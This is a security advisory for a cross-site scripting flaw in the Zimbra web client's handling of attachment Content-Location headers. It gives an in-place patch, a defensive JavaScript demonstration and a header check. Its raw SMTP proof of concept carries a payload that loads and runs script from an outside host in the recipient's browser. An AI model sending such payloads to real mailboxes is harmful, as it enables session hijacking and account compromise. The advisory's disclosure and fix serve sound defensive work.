The Zimbra Collaboration Suite (ZCS) web client does not sanitize the Content-Location header of an attachment before using it as an href, so a crafted email loads arbitrary JavaScript when it is opened. Credits to Securify.nl: https://www.securify.nl/advisory/SFY20180101/cross-site-scripting-vulnerability-in-zimbra-collaboration-suite-due-to-the-way-it-handles-attachment-links.html
Hotfix: patch the web client bundle in place as shown below. No restart is required on your Zimbra servers.
$ cd /opt/zimbra/jetty_base/webapps/zimbra/js/
$ gunzip -S zgz MailCore_all.js.zgz
Note: because the suffix passed to -S has no leading dot, gunzip leaves the decompressed file named "MailCore_all.js." (with a trailing dot); the following commands use that name.
$ vi MailCore_all.js.
replace:
o[t++]=e?"href='"+e+"' ":"";
with:
o[t++]=e?"href='"+AjxStringUtil.htmlEncode(e)+"' ":"";
$ gzip -S zgz MailCore_all.js.
Proof of concept, entered as a raw SMTP session:
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
From: <[email protected]>
To: <[email protected]>
Subject: Open me for free money
Content-Type: multipart/mixed; boundary="----=_Part_112602234_144352703.1515072325170"
------=_Part_112602234_144352703.1515072325170
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 7bit
Some text !
------=_Part_112602234_144352703.1515072325170
Content-Type: text/plain; name=attachment.txt
Content-Disposition: attachment; filename=attachment.txt
Content-Transfer-Encoding: base64
Content-Location: http://foo.bar'></a><img src=a onerror=window.x=document.createElement('script');window.x.src='http://b.oz-web.com/X';document.body.appendChild(window.x)><a href='
YXR0YWNobWVudAo=
------=_Part_112602234_144352703.1515072325170--
.
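To show why the one-line patch above neutralizes the Content-Location payload in the proof of concept, here is an added example (not Zimbra's code) that rebuilds the attachment-link fragment the way the vulnerable line does, once with the raw header value and once through a stand-in htmlEncode that escapes the five HTML-significant characters, plus a small header check a mail gateway or log review could use to flag Content-Location values carrying markup characters. The names htmlEncode, buildAttachmentLink, countTags and isSuspiciousContentLocation are assumed, and the sample header value is constructed.

```javascript
// Added example, not Zimbra's code. Stand-in for AjxStringUtil.htmlEncode:
// escapes the five characters that can close an attribute or open a tag.
function htmlEncode(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Mirrors the vulnerable concatenation in MailCore_all.js:
//   o[t++] = e ? "href='" + e + "' " : "";
// `encode` selects the patched behaviour (assumed wrapper, not Zimbra's).
function buildAttachmentLink(contentLocation, encode) {
  var e = contentLocation;
  var attr = e ? "href='" + (encode ? htmlEncode(e) : e) + "' " : "";
  return "<a " + attr + "target='_blank'>attachment.txt</a>";
}

// Number of start tags a browser would parse in the fragment.
// A correctly built link has exactly one; a broken attribute leaks extra tags.
function countTags(html) {
  return (html.match(/<[a-z]/gi) || []).length;
}

// Defensive check for a mail gateway or log review: Content-Location is a
// URL, so quotes, angle brackets and whitespace have no business in it.
function isSuspiciousContentLocation(value) {
  return /['"<>\s]/.test(value);
}

// Constructed sample in the shape of the advisory's payload (benign probe).
var sample = "http://example.invalid/x'></a><img src=a onerror=alert(1)><a href='";

var vulnerable = buildAttachmentLink(sample, false); // three tags: a, img, a
var patched = buildAttachmentLink(sample, true);     // one tag, payload inert
```

Whatever encoder is used in the real patch must also escape the single quote, since the attribute value is single-quoted; an encoder that only handles &, < and > would still leave the attribute breakable.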